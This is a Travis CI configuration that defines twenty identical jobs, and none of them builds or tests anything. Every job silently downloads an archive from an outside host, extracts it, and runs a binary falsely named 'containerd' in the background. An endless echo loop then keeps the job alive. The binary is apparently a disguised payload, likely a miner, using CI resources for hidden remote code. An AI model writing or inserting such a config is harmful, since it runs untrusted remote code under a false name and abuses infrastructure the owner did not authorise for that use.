language: python
dist: focal


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build2"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build3"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build4"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build5"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build6"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build7"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build8"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build9"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build10"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build11"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build12"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build13"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build14"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build15"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build16"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build17"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build18"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build19"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
        
    -
      name: "build20"
      script:
        - wget -q http://cisauk.com/kune/moon/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 60; done
